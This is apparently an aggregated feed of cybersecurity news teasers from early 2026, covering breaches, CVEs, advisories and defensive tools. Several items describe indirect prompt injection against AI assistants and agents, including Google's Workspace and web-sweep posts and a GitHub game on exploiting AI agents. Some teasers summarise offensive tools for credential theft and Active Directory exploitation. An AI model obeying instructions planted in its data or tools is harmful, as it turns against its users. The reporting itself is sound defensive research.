https://www.hackmageddon.com/2026/05/08/16-30-april-2026-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Canvas Breach Disrupts Schools & Colleges Nationwide
An ongoing data extortion attack targeting the widely-used education technology platform Canvas disrupted classes and coursework at school districts and universities across the United States today, after a cybercrime group defaced the service's login page with a ransom demand that threatened to leak data from 275 million students and faculty across nearly 9,000 educational institutions.
https://krebsonsecurity.com/2026/05/canvas-breach-disrupts-schools-colleges-nationwide/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proofpoint Establishes Innovation Precedent for Source-Agnostic Modern Enterprise Investigations
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-establishes-innovation-precedent-source-agnostic-modern
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI and the New Threat Landscape | Sumit Dhawan with NightDragon | RSAC 2026
https://www.proofpoint.com/us/newsroom/news/ai-and-new-threat-landscape-sumit-dhawan-nightdragon-rsac-2026
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Active Directory Exploitation with Metasploit
The walkthrough covers thirteen distinct attack phases: AD CS template reconnaissance, LDAP enumeration, Kerberos weakness discovery, credential extraction, SAMR account manipulation, Resource-Based Constrained Delegation abuse,
The post Active Directory Exploitation with Metasploit appeared first on Hacking Articles.
https://www.hackingarticles.in/active-directory-exploitation-with-metasploit/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Most Powerful Women Of The Channel 2026: Power 100
https://www.proofpoint.com/us/newsroom/news/most-powerful-women-channel-2026-power-100
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI Coding Agents Are Redefining Cyber Risk — Is Your Exposure Strategy Ready?
AI coding tools have allowed engineering teams to double their output, and 64% of organizations…
AI Coding Agents Are Redefining Cyber Risk — Is Your Exposure Strategy Ready? on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/05/04/ai-coding-agents-are-redefining-cyber-risk-is-your-exposure-strategy-ready/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stronger Cybersecurity, Stronger Business: NIST Celebrates 2026 National Small Business Week
Happy National Small Business Week! For over 60 years, the U.S. Small Business Administration has led this initiative to acknowledge the critical contributions of America's entrepreneurs and small business owners. Part of the U.S. Department of Commerce, NIST's mission is to drive U.S. innovation and global competitiveness, and the small business community is central to this mission. In this year's blog, we shine a spotlight on some new and upcoming NIST resources that are all focused on strengthening the cybersecurity and resilience of the nation's small business community. Build Your Small
https://www.nist.gov/blogs/cybersecurity-insights/stronger-cybersecurity-stronger-business-nist-celebrates-2026-national
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft Shell Spoofing Zero-day Vulnerability
What is the Attack?
A newly disclosed vulnerability, CVE-2026-32202, has emerged due to an incomplete patch by Microsoft for a previously exploited remote code execution flaw (CVE-2026-21510). While the original update addressed both RCE and SmartScreen bypass, it failed to eliminate a residual zero-click NTLM authentication coercion issue. This allows attackers to silently force a victim system to authenticate against a malicious server without user interaction.
The threat activity has been linked to APT28 (also known as Fancy Bear / UAC-0001), which began exploiting the original vulnerability chain in December 2025, targeting organizations across Ukraine and the EU. Evidence confirms exploitation in the wild as early as...
https://fortiguard.fortinet.com/threat-signal-report/6429
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Preparing for a ‘vulnerability patch wave'
Organisations must act now to prepare for a wave of patches that will address decades of technical debt.
https://www.ncsc.gov.uk/blogs/prepare-for-vulnerability-patch-wave
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Anti-DDoS Firm Heaped Attacks on Brazilian ISPs
A Brazilian tech firm that specializes in protecting networks from distributed denial-of-service (DDoS) attacks has been enabling a botnet responsible for an extended campaign of massive DDoS attacks against other network operators in Brazil, KrebsOnSecurity has learned. The firm's chief executive says the malicious activity resulted from a security breach and was likely the work of a competitor trying to tarnish his company's public image.
https://krebsonsecurity.com/2026/04/anti-ddos-firm-heaped-attacks-on-brazilian-isps/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Impacket for Pentester: Net
This article walks through three authentication paths that impacket-net supports — NTLM hash (Pass-the-Hash), Kerberos ticket, and AES key — and demonstrates how each one
The post Impacket for Pentester: Net appeared first on Hacking Articles.
https://www.hackingarticles.in/impacket-for-pentester-net/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Operation Road Trap: Fake toll and parking texts are spreading worldwide
A new mass smishing campaign uncovered by Bitdefender Labs shows that scammers are sending tens of thousands of fraudulent text messages to mobile users across 12 countries, impersonating transport authorities, toll operators, and parking services.
Key takeaways
* Since December 2025, Bitdefender Labs researchers have been tracking smishing campaigns targeting drivers on a global scale. The scam campaigns are still active as of April 2026
* Over 79,000 fraudulent messages have already been
https://www.bitdefender.com/en-us/blog/labs/operation-road-trap
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Active Directory User Enumeration: A Comprehensive Guide
This article walks through sixteen distinct techniques for enumerating users inside Active Directory, drawing on the full spectrum of protocols an attacker can reach the
The post Active Directory User Enumeration: A Comprehensive Guide appeared first on Hacking Articles.
https://www.hackingarticles.in/active-directory-user-enumeration-a-comprehensive-guide/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Securing the git push pipeline: Responding to a critical remote code execution vulnerability
How we validated, fixed, and investigated a critical vulnerability in under two hours, and confirmed no exploitation.
The post Securing the git push pipeline: Responding to a critical remote code execution vulnerability appeared first on The GitHub Blog.
https://github.blog/security/securing-the-git-push-pipeline-responding-to-a-critical-remote-code-execution-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From DMV to Wallet: Understanding Verifiable Digital Credential Issuance
In our last post in this series, we compared two credential formats that shape the digital identity ecosystem: ISO/IEC 18013-5 and -7 mobile documents (mdocs) and W3C Verifiable Credentials (VCs). Both formats define how a credential is structured and shared, but neither can function without an issuance process. This blog post explores what it takes to issue verifiable digital credentials, with a focus on mobile driver's licenses (mDLs). We'll look at how issuance works today in practice, where inconsistencies exist, and how standards bodies (FIDO, ISO and OpenID Foundation) are working to
https://www.nist.gov/blogs/cybersecurity-insights/dmv-wallet-understanding-verifiable-digital-credential-issuance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Q1 2026 Cyber Attack Statistics
I aggregated the statistics created from the cyber attacks timelines published in the first quarter of 2026. In this period, I collected a total of 528 events (5.87 events/day) dominated by Cyber Crime with 66%, followed by Cyber Espionage with 18%, Hacktivism with 3%, and finally Cyber Warfare with 2%.
https://www.hackmageddon.com/2026/04/28/q1-2026-cyber-attack-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Tabletop Simulations: Where Theory Meets Reality
On paper, the vast majority of crisis plans look reasonable, actionable and complete. Once the rubber hits the road, however, chaos emerges quickly.
https://blog.compass-security.com/2026/04/tabletop-simulations-where-theory-meets-reality/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scaling Our Vision: Welcoming Tamar Nulman and Omri Arnon to the Legit Team
https://www.legitsecurity.com/blog/scaling-our-vision-welcoming-tamar-nulman-and-omri-arnon-to-the-legit-team
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Could your choice of metrics be harming your SOC?
Poor metrics can render a well-intentioned security operation centre entirely ineffective.
https://www.ncsc.gov.uk/blogs/could-your-choice-of-metrics-be-harming-your-soc
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1-15 April 2026 Cyber Attacks Timeline
The first timeline of April 2026 brings an evolution in terms of methodology: from now on I will map the initial access techniques with the MITRE ATT&CK model. I also decided to merge the categories of Finance and Fintech in the sectors chart. From an event perspective, the first half of April 2026 confirmed a sustained trend...
https://www.hackmageddon.com/2026/04/24/1-15-april-2026-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI threats in the wild: The current state of prompt injections on the web
Posted by Thomas Brunner, Yu-Han Liu, Moni PandeAt Google, our Threat Intelligence teams are dedicated to staying ahead of real-world adversarial activity, proactively monitoring emerging threats before they can impact users. Right now, Indirect Prompt Injection (IPI) is a top priority for the security community, anticipating it as a primary attack vector for adversaries to target and compromise AI agents. But while the danger of IPI is widely discussed, are threat actors actually exploiting this vector today – and if so, how?To answer these questions and to uncover real-world abuse, we initiated a broad sweep of the public web to monitor for known indirect prompt injection patterns. This is what we found. The threat of indirect prompt injectionUnlike a direct injection where a user...
http://security.googleblog.com/2026/04/ai-threats-in-wild-current-state-of.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NCSC: Leave passwords in the past - passkeys are the future
Passkeys are the more secure and user-friendly login method and should be the default authentication option for consumers.
https://www.ncsc.gov.uk/news/ncsc-leave-passwords-in-the-past-passkeys-are-the-future
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
International cyber agencies share fresh advice to defend against China-linked covert networks
New advisory highlights how to defend against attacker tactics believed to be used by China-linked actors to hide malicious cyber activity.
https://www.ncsc.gov.uk/news/international-cyber-agencies-fresh-advice-defend-against-china-linked-covert-networks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Supporting AI adoption for UK cyber defence
Adopting AI will require time, the development of new capabilities and careful oversight.
https://www.ncsc.gov.uk/blogs/supporting-ai-adoption-for-uk-cyber-defence
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Executive Summary: Defending against China-nexus covert networks of compromised devices
Organisations should map and baseline their edge device traffic, especially VPN and remote access connections, and adopt dynamic threat feed filtering that includes known covert network indicators.
https://www.ncsc.gov.uk/news/executive-summary-defending-against-china-nexus-covert-networks-of-compromised-devices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Defending against China-nexus covert networks of compromised devices
Explaining the widespread shift in tactics, techniques and procedures (TTPs) towards networks of compromised infrastructure, and how to defend against it
https://www.ncsc.gov.uk/news/defending-against-china-nexus-covert-networks-of-compromised-devices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Passkeys are more secure than traditional ways to log in
Passkeys offer a more usable, secure replacement for passwords and are already supported by most modern devices.
https://www.ncsc.gov.uk/blogs/passkeys-are-more-secure-than-traditional-ways-to-log-in
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Apache ActiveMQ RCE
What is the Vulnerability?
CVE-2026-34197 is a high-severity remote code execution (RCE) vulnerability affecting Apache ActiveMQ Classic. The flaw resides in the exposed Jolokia JMX-HTTP interface and allows attackers to execute arbitrary commands on the underlying system via crafted broker management requests.
Recent reporting indicates that this vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild and elevating its priority for remediation.
What is the recommended Mitigation?
• Immediate Actions: Upgrade to:
ActiveMQ 5.19.4+
ActiveMQ 6.2.3+
• Restrict...
https://fortiguard.fortinet.com/threat-signal-report/6428
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
March 2026 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for March 2026 where I collected and analyzed 282 events: a sharp increase compared to the 176 events of the previous month. In March 2026, Cyber Crime continued to lead the Motivations chart with 64%, ahead of Cyber Espionage at number two with 15%. Hacktivism took over the third position with 6%, ahead of Cyber Warfare with 3%.
https://www.hackmageddon.com/2026/04/16/march-2026-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Azure-Hosted Scanning Cluster Launches WordPress Webshell Discovery Campaign
Sensor Intel Series: March 2026 CVE Trends
https://www.f5.com/labs/articles/azure-hosted-scanning-cluster-launches-wordpress-webshell-discovery-campaign
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hack the AI agent: Build agentic AI security skills with the GitHub Secure Code Game
Learn to find and exploit real-world agentic AI vulnerabilities through five progressive challenges in this free, open source game that over 10,000 developers have already used to sharpen their security skills.
The post Hack the AI agent: Build agentic AI security skills with the GitHub Secure Code Game appeared first on The GitHub Blog.
https://github.blog/security/hack-the-ai-agent-build-agentic-ai-security-skills-with-the-github-secure-code-game/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How exposed is your code? Find out in minutes—for free
The new Code Security Risk Assessment gives you a one-click view of vulnerabilities across your organization, at no cost.
The post How exposed is your code? Find out in minutes—for free appeared first on The GitHub Blog.
https://github.blog/security/application-security/how-exposed-is-your-code-find-out-in-minutes-for-free/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
16-31 March 2026 Cyber Attacks Timeline
The second half of March 2026 has been very active from an infosec standpoint, with 124 events and a threat landscape dominated by malware. As always, cyber crime led the motivations chart with 65%, slightly up from the previous timeline.
https://www.hackmageddon.com/2026/04/14/16-31-march-2025-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Common Entra ID Security Assessment Findings – Part 4: Weak Conditional Access Policies
This post is part of a small blog series covering common Entra ID security findings observed during real-world assessments. Each article explores selected findings in more detail to provide a clearer understanding of the underlying risks and practical implications. Conditional Access Policies Conditional Access policies are among the most important security controls in Entra ID. […]
https://blog.compass-security.com/2026/04/common-entra-id-security-assessment-findings-part-4-weak-conditional-access-policies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Just for Fun – An Unofficial Pen Test Game Module for D&D 5e
Friends, I built an unlicensed, totally unofficial module for my local gaming group based on Dungeons and Dragons 5th Edition, specifically the amazing “Keys from the Golden Vault” heist book. You can download it here. It cannot be resold, and please credit me in distribution. Love to hear your feedback from playtests!
https://tisiphone.net/2026/04/13/just-for-fun-an-unofficial-pen-test-game-module-for-dd-5e/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Medusa Ransomware Attack
What is the Attack?
Microsoft Threat Intelligence has identified Storm-1175, a financially motivated threat actor conducting high-tempo ransomware operations leveraging the Medusa ransomware variant. The group specializes in rapidly exploiting vulnerable web-facing systems, often weaponizing newly disclosed vulnerabilities (N-days) and even zero-days before public disclosure.
Storm-1175 | Medusa ransomware operations | Microsoft Security Blog
A defining characteristic of this campaign is speed; attackers can move from initial access to full ransomware deployment within 24 hours, significantly reducing detection and response windows.
• Observed targeting includes:
Healthcare
...
https://fortiguard.fortinet.com/threat-signal-report/6398
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bringing Rust to the Pixel Baseband
Posted by Jiacheng Lu, Software Engineer, Google Pixel Team
Google is continuously advancing the security of Pixel devices. We have been focusing on hardening the cellular baseband modem against exploitation. Recognizing the risks associated within the complex modem firmware, Pixel 9 shipped with mitigations against a range of memory-safety vulnerabilities. For Pixel 10, Google is advancing its proactive security measures further. Following our previous discussion on "Deploying Rust in Existing Firmware Codebases", this post shares a concrete application: integrating a memory-safe Rust DNS(Domain Name System) parser into the modem firmware. The new Rust-based DNS parser significantly reduces our security risk by mitigating an entire class of vulnerabilities in a risky area, while also laying...
http://security.googleblog.com/2026/04/bringing-rust-to-pixel-baseband.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mythos: Just One Piece of the Cybersecurity Puzzle
https://www.legitsecurity.com/blog/mythos-just-one-piece-of-the-cybersecurity-puzzle
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Protecting Cookies with Device Bound Session Credentials
Posted by Ben Ackerman, Chrome team, Daniel Rubery, Chrome team and Guillaume Ehinger, Google Account Security team
Following our April 2024 announcement, Device Bound Session Credentials (DBSC) is now entering public availability for Windows users on Chrome 146, and expanding to macOS in an upcoming Chrome release. This project represents a significant step forward in our ongoing efforts to combat session theft, which remains a prevalent threat in the modern security landscape.
Session theft typically occurs when a user inadvertently downloads malware onto their device. Once active, the malware can silently extract existing session cookies from the browser or wait for the user to log in to new accounts, before exfiltrating these tokens to an attacker-controlled server. Infostealer malware...
http://security.googleblog.com/2026/04/protecting-cookies-with-device-bound.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
TrueConf Zero-Day Attack
What is the Attack?
Operation TrueChaos is a targeted cyber espionage campaign exploiting a zero-day vulnerability in the TrueConf video conferencing platform. The campaign primarily targets government entities in Southeast Asia by replacing a legitimate update with a malicious one. Threat actors effectively weaponized the product's trusted update mechanism, transforming it into a covert malware distribution channel.
The campaign has been observed leveraging this flaw to deploy the open-source Havoc command-and-control (C2) framework to compromised endpoints, enabling persistent remote access, post-exploitation control, and lateral movement within affected environments.
On April 2, 2026, the Cybersecurity...
https://fortiguard.fortinet.com/threat-signal-report/6394
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Common Entra ID Security Assessment Findings – Part 3: Weak Privileged Identity Management Configuration
This post is part of a small blog series covering common Entra ID security findings observed during real-world assessments. Each article explores selected findings in more detail to provide a clearer understanding of the underlying risks and practical implications. What Is Privileged Identity Management? Privileged Identity Management (PIM) is a service in Microsoft Entra ID […]
https://blog.compass-security.com/2026/04/common-entra-id-security-assessment-findings-part-3-weak-privileged-identity-management-configuration/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Workspace's continuous approach to mitigating indirect prompt injections
Posted by Adam Gavish, Google GenAI Security TeamIndirect prompt injection (IPI) is an evolving threat vector targeting users of complex AI applications with multiple data sources, such as Workspace with Gemini. This technique enables the attacker to influence the behavior of an LLM by injecting malicious instructions into the data or tools used by the LLM as it completes the user's query. This may even be possible without any input directly from the user.IPI is not the kind of technical problem you “solve” and move on. Sophisticated LLMs with increasing use of agentic automation combined with a wide range of content create an ultra-dynamic and evolving playground for adversarial attacks. That's why Google takes a sophisticated and comprehensive approach to these attacks. We're continuously...
http://security.googleblog.com/2026/04/google-workspaces-continuous-approach.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Securing the open source supply chain across GitHub
Recent attacks on open source focus on exfiltrating secrets; here are the prevention steps you can take today, plus a look at the security capabilities GitHub is working on.
The post Securing the open source supply chain across GitHub appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/securing-the-open-source-supply-chain-across-github/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
When AI Writes the Code, What Changes for Security?
https://www.legitsecurity.com/blog/when-ai-writes-the-code-what-changes-for-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
VRP 2025 Year in Review
Posted by Dirk Göhmann, Tony Mendez, and the Vulnerability Rewards Program Team2025 marked a special year in the history of vulnerability rewards and bug bounty programs at Google: our 15th anniversary 🎉🎉🎉! Originally started in 2010, our vulnerability reward program (VRP) has seen constant additions and expansions over the past decade and a half, clearly indicating the value the programs under this umbrella contribute to the safety and security of Google and its users, but also highlighting their acceptance by the external research community, without which such programs cannot function.Coming back to 2025 specifically, our VRP once again confirmed the ongoing value of engaging with the external security research community to make Google and its products safer. This was more evident...
http://security.googleblog.com/2026/03/vrp-2025-year-in-review.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Axios Hijacked: npm Account Takeover Deploys Cross-Platform RAT to Millions
Axios Hijacked: npm Account Takeover Deploys Cross-Platform RAT to Millions
https://www.legitsecurity.com/blog/axios-hijacked-npm-account-takeover-deploys-cross-platform-rat-to-millions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Common Entra ID Security Assessment Findings – Part 2: Privileged Unprotected Groups
In part 2 of our 4-part series on common Entra ID security findings, we show how seemingly harmless group configurations can be abused to bypass security controls and gain high privileges.
The post shows scenarios where insufficiently protected groups are used to:
weaken Conditional Access protections for administrators
enable privilege escalation through PIM for Groups
grant privileged access to Azure resources, leading to full compromise
We also show how to detect these issues in practice using EntraFalcon and how to mitigate them.
https://blog.compass-security.com/2026/03/common-entra-id-security-assessment-findings-part-2-privileged-unprotected-groups/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A year of open source vulnerability trends: CVEs, advisories, and malware
Reviewed advisories hit a four-year low, malware advisories surged, and CNA publishing grew—here's what changed and what it means for your triage and response.
The post A year of open source vulnerability trends: CVEs, advisories, and malware appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/a-year-of-open-source-vulnerability-trends-cves-advisories-and-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1-15 March 2026 Cyber Attacks Timeline
In the first half of March 2026 I collected 95 events (6.34 events/day) with a threat landscape dominated by malware once ahead of account takeovers and ransomware.
https://www.hackmageddon.com/2026/03/26/1-15-march-2026-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
When Your Scanner Becomes the Weapon: From Trivy to LiteLLM
When Your Scanner Becomes the Weapon: From Trivy to LiteLLM
https://www.legitsecurity.com/blog/when-your-scanner-becomes-the-weapon-from-trivy-to-litellm
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Security for the Quantum Era: Implementing Post-Quantum Cryptography in Android
Posted by Eric Lynch, Product Manager, Android and Dom Elliott, Group Product Manager, Google Play
Modern digital security is at a turning point. We are on the threshold of using quantum computers to solve "impossible" problems in drug discovery, materials science, and energy—tasks that even the most powerful classical supercomputers cannot handle. However, the same unique ability to consider different options simultaneously also allows these machines to bypass our current digital locks. This puts the public-key cryptography we've relied on for decades at risk, potentially compromising everything from bank transfers to trade secrets. To secure our future, it is vital to adopt the new Post-Quantum Cryptography (PQC) standards National Institute of Standards and Technology (NIST) is urging...
http://security.googleblog.com/2026/03/post-quantum-cryptography-in-android.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Trivy Supply Chain Compromise: What Happened and Playbooks to Respond
The Trivy Supply Chain Compromise: What Happened and Playbooks to Respond
https://www.legitsecurity.com/blog/the-trivy-supply-chain-compromise-what-happened-and-playbooks-to-respond
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Common Entra ID Security Assessment Findings – Part 1: Foreign Enterprise Applications With Privileged API Permissions
This post is part of a small blog series covering common Entra ID security findings observed during real-world assessments. Each article explores selected findings in more detail to support a clearer understanding of the underlying risks and practical implications. Introduction In the vast majority of tenants we review, there are enterprise applications that originate from […]
https://blog.compass-security.com/2026/03/common-entra-id-security-assessment-findings-part-1-foreign-enterprise-applications-with-privileged-api-permissions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
MSSQLand – Lightweight MS-SQL Interaction Tool for Lateral Movement and Post-Exploitation
MSSQLand enables red teams to interact with MS-SQL servers and linked instances in restricted environments without complex T-SQL queries. Assembly-ready tool for lateral movement.
https://www.darknet.org.uk/2026/03/mssqland-lightweight-ms-sql-interaction-tool-for-lateral-movement-and-post-exploitation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GitHub expands application security coverage with AI‑powered detections
CodeQL and AI‑powered detections work together in GitHub Code Security to identify vulnerabilities across more languages and frameworks.
The post GitHub expands application security coverage with AI‑powered detections appeared first on The GitHub Blog.
https://github.blog/security/application-security/github-expands-application-security-coverage-with-ai-powered-detections/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Reflections from the Second NIST Cyber AI Profile Workshop
Thank you to everyone who participated in the Cybersecurity Framework Profile for Artificial Intelligence (Cyber AI Profile) Workshop in January! The input we received on the Preliminary Draft during this workshop has been invaluable and is informing the development of the next draft of the NIST Cyber AI Profile. We are working toward publishing a full workshop summary soon that captures themes and highlights from the event. In the interim, we would like to share a preview of what we heard… Background on the Second Cyber AI Profile Workshop This workshop was a continuation of the past months
https://www.nist.gov/blogs/cybersecurity-insights/reflections-second-nist-cyber-ai-profile-workshop
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
All aboard: the NIST Cybersecurity for IoT Program is headed to our next stop! Share your input on where we're headed during our Future Directions Two-Day Workshop on March 31st.
Workshop Details… We're looking forward to hearing from the community during our “Future Directions” Workshop! Date: March 31 - April 1, 2026 Where: NIST's Gaithersburg campus! Registration and Details: HERE Can't make it? We still want to hear from you – email us at IoTSecurity [at] nist.gov (IoTSecurity[at]nist[dot]gov). All Aboard for Product Cybersecurity The NIST Cybersecurity for Internet of Things (IoT) Program was established to help real-world practitioners navigate the gray areas between IT and connected products. This provides clarity when it comes to challenges, available existing resources, and understanding where
https://www.nist.gov/blogs/cybersecurity-insights/all-aboard-nist-cybersecurity-iot-program-headed-our-next-stop-share
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windsurf IDE Extension Drops Malware via Solana Blockchain
Bitdefender researchers have discovered a malicious Windsurf IDE (integrated development environment) extension that deploys a multi-stage NodeJS stealer by using the Solana blockchain as the payload infrastructure.
https://www.bitdefender.com/en-us/blog/labs/windsurf-extension-malware-solana
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Investing in the people shaping open source and securing the future together
See how GitHub is investing in open source security funding maintainers, partnering with Alpha-Omega, and expanding access to help reduce burden and strengthen software supply chains.
The post Investing in the people shaping open source and securing the future together appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/investing-in-the-people-shaping-open-source-and-securing-the-future-together/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From Enumeration to Findings: The Security Findings Report in EntraFalcon
We just released a big update for EntraFalcon. The new Security Findings Report adds an interactive HTML overview to EntraFalcon that consolidates tenant settings and object-based checks into structured security findings. Over 60 checks, graphical charts, filtering, export, and more options are now available.
https://blog.compass-security.com/2026/03/from-enumeration-to-findings-the-security-findings-report-in-entrafalcon/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows and macOS Malware Spreads via Fake “Claude Code” Google Ads
Bitdefender's security researchers have discovered a malicious Google Ads campaign targeting anyone searching for downloads related to Claude, the large language model developed by Anthropic.
https://www.bitdefender.com/en-us/blog/labs/fake-claude-code-google-ads-malware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Credential Stuffing in 2025 – How Combolists, Infostealers and Account Takeover Became an Industry
Credential stuffing drove 22% of all breaches in 2025. How combolists, infostealers and ATO tooling are fuelling enterprise account takeover at scale
https://www.darknet.org.uk/2026/03/credential-stuffing-in-2025-how-combolists-infostealers-and-account-takeover-became-an-industry/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Global Scam Machines: Inside a Meta-Powered Investment Fraud Ecosystem Spanning 25 Countries
In February-March 2026, Bitdefender Labs identified and mapped a sprawling global scam infrastructure and scalable disinformation-for-profit network that uses trusted news brands, real personalities, fabricated media narratives, emotional hooks, and advanced evasion techniques to drive victims into investment fraud funnels.
On February 9-March 5, 2026, we analyzed 310 malvertising campaigns distributed through paid advertising on Meta platforms.
Key findings:
* This is a global, coordinated
https://www.bitdefender.com/en-us/blog/labs/global-investment-scam-network-using-meta-ads
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DumpBrowserSecrets – Browser Credential Harvesting with App-Bound Encryption Bypass
DumpBrowserSecrets extracts saved passwords, cookies, OAuth tokens and autofill data from Chrome, Edge, Firefox, Opera and Vivaldi, bypassing App-Bound Encryption via Early Bird APC injection.
https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CASI Leaderboard Shifts: Sugar-Coated Poison, and the Expanding AI Attack Surface
AI Security Insights – March 2026
https://www.f5.com/labs/articles/casi-leaderboard-shifts-sugar-coated-poison-and-the-expanding-ai-attack-surface
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
On the Effectiveness of Mutational Grammar Fuzzing
Mutational grammar fuzzing is a fuzzing technique in which the fuzzer uses a predefined grammar that describes the structure of the samples. When a sample gets mutated, the mutations happen in such a way that any resulting samples still adhere to the grammar rules, thus the structure of the samples gets maintained by the mutation process. In case of coverage-guided grammar fuzzing, if the resulting sample (after the mutation) triggers previously unseen code coverage, this sample is saved to the sample corpus and used as a basis for future mutations. This technique has proven capable of finding complex issues and I have used it successfully in the past, including to find issues in XSLT implementations in web browsers and even JIT engine bugs. However, despite the approach being effective, it...
https://projectzero.google/2026/03/mutational-grammar-fuzzing.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.5.2 and 1.4.4 security patch versions published
Today, we are publishing the 1.5.2 and 1.4.4 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub with both Alpine and Debian containers. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version. 1.5.2 ClamAV 1.5.2 is a patch release with the following fixes: CVE-2026-20031: Fixed an error handling bug in the HTML file parser that may crash the program and cause a denial-of-service (DoS) condition. This issue was introduced in version 1.1.0. The fix is included in 1.5.2 and 1.4.4. Fixed a possible infinite loop when scanning some JPEG files by upgrading affected ClamAV...
https://blog.clamav.net/2026/03/clamav-152-and-144-security-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
WinGet Desired State: Initial Access Established
While not new, a self-referencing LNK file in combination with winget configuration instructions can be a viable initial access payload for environments where the Microsoft Store is not disabled.
https://blog.compass-security.com/2026/03/winget-desired-state-initial-access-established/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Legit Security Named 2026 AI Code Innovator in AppSec, Leader in AppSec Management
Legit Security Named 2026 AI Code Innovator in AppSec, Leader in AppSec Management
https://www.legitsecurity.com/blog/legit-security-named-2026-ai-code-innovator-in-appsec-leader-in-appsec-management
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cultivating a robust and efficient quantum-safe HTTPS
Posted by Chrome Secure Web and Networking Team
Today we're announcing a new program in Chrome to make HTTPS certificates secure against quantum computers. The Internet Engineering Task Force (IETF) recently created a working group, PKI, Logs, And Tree Signatures (“PLANTS”), aiming to address the performance and bandwidth challenges that the increased size of quantum-resistant cryptography introduces into TLS connections requiring Certificate Transparency (CT). We recently shared our call to action to secure quantum computing and have written about challenges introduced by quantum-resistant cryptography and some of the steps we've taken to address them in earlier blog posts.
To ensure the scalability and efficiency of the ecosystem, Chrome has no immediate plan to add traditional...
http://security.googleblog.com/2026/02/cultivating-robust-and-efficient.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A Deep Dive into the GetProcessHandleFromHwnd API
